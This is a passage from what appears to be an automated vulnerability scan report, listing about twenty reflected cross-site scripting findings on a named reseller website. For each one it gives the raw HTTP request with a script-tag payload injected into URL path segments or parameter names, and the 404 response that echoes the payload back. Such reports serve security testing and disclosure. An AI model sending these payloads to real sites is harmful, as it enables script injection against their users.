Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/search.php?keyword=search...&Submit3=Search&opt=24e12e<a>d02514c8309 was not found on this server.</p>
...[SNIP]...

2.2924. http://www.resellerbase.com/detail/41/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a845f<script>alert(1)</script>c779ff72628 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila845f<script>alert(1)</script>c779ff72628/41/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila845f<script>alert(1)</script>c779ff72628/41/themes/ was not found on this server.</p>
...[SNIP]...

2.2925. http://www.resellerbase.com/detail/41/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da975<script>alert(1)</script>cbfae70c1d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41da975<script>alert(1)</script>cbfae70c1d0/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41da975<script>alert(1)</script>cbfae70c1d0/themes/ was not found on this server.</p>
...[SNIP]...

2.2926. http://www.resellerbase.com/detail/41/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ccf15<script>alert(1)</script>2fd437816e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themesccf15<script>alert(1)</script>2fd437816e2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themesccf15<script>alert(1)</script>2fd437816e2/ was not found on this server.</p>
...[SNIP]...

2.2927. http://www.resellerbase.com/detail/41/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 91d34<script>alert(1)</script>145f5385e7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/?91d34<script>alert(1)</script>145f5385e7c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/?91d34<script>alert(1)</script>145f5385e7c=1 was not found on this server.</p>
...[SNIP]...

2.2928. http://www.resellerbase.com/detail/41/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b473e<script>alert(1)</script>cb5fcc06827 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb473e<script>alert(1)</script>cb5fcc06827/41/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb473e<script>alert(1)</script>cb5fcc06827/41/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2929. http://www.resellerbase.com/detail/41/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7f96<script>alert(1)</script>edf903be74c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41c7f96<script>alert(1)</script>edf903be74c/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41c7f96<script>alert(1)</script>edf903be74c/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2930. http://www.resellerbase.com/detail/41/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79dd3<script>alert(1)</script>6728b5dd69e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes79dd3<script>alert(1)</script>6728b5dd69e/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2931. http://www.resellerbase.com/detail/41/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aed53<script>alert(1)</script>cecd21aab12 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmosaed53<script>alert(1)</script>cecd21aab12/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmosaed53<script>alert(1)</script>cecd21aab12/ was not found on this server.</p>
...[SNIP]...

2.2932. http://www.resellerbase.com/detail/41/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7703c<script>alert(1)</script>11db0c3f01f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/?7703c<script>alert(1)</script>11db0c3f01f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/?7703c<script>alert(1)</script>11db0c3f01f=1 was not found on this server.</p>
...[SNIP]...

2.2933. http://www.resellerbase.com/detail/41/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f24e<script>alert(1)</script>72d9c766973 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8f24e<script>alert(1)</script>72d9c766973/41/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8f24e<script>alert(1)</script>72d9c766973/41/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2934. http://www.resellerbase.com/detail/41/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 62702<script>alert(1)</script>bea573ccee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4162702<script>alert(1)</script>bea573ccee/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4162702<script>alert(1)</script>bea573ccee/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2935. http://www.resellerbase.com/detail/41/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79732<script>alert(1)</script>4693da2c4e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes79732<script>alert(1)</script>4693da2c4e3/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes79732<script>alert(1)</script>4693da2c4e3/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2936. http://www.resellerbase.com/detail/41/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 907ed<script>alert(1)</script>7e6ee5f313e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos907ed<script>alert(1)</script>7e6ee5f313e/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos907ed<script>alert(1)</script>7e6ee5f313e/images/ was not found on this server.</p>
...[SNIP]...

2.2937. http://www.resellerbase.com/detail/41/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 16893<script>alert(1)</script>52e2d52d552 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images16893<script>alert(1)</script>52e2d52d552/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images16893<script>alert(1)</script>52e2d52d552/ was not found on this server.</p>
...[SNIP]...

2.2938. http://www.resellerbase.com/detail/41/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 738c3<script>alert(1)</script>ffd0a9a8cbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/?738c3<script>alert(1)</script>ffd0a9a8cbc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/?738c3<script>alert(1)</script>ffd0a9a8cbc=1 was not found on this server.</p>
...[SNIP]...

2.2939. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd410<script>alert(1)</script>e6f4db6687a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailbd410<script>alert(1)</script>e6f4db6687a/41/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailbd410<script>alert(1)</script>e6f4db6687a/41/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2940. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99636<script>alert(1)</script>e9acf9c8c2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4199636<script>alert(1)</script>e9acf9c8c2f/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4199636<script>alert(1)</script>e9acf9c8c2f/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2941. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bde69<script>alert(1)</script>b76042b48a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themesbde69<script>alert(1)</script>b76042b48a7/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themesbde69<script>alert(1)</script>b76042b48a7/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2942. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2fe01<script>alert(1)</script>5288426f9f6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos2fe01<script>alert(1)</script>5288426f9f6/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos2fe01<script>alert(1)</script>5288426f9f6/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2943. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 44ec0<script>alert(1)</script>91ee332c6d3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images44ec0<script>alert(1)</script>91ee332c6d3/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
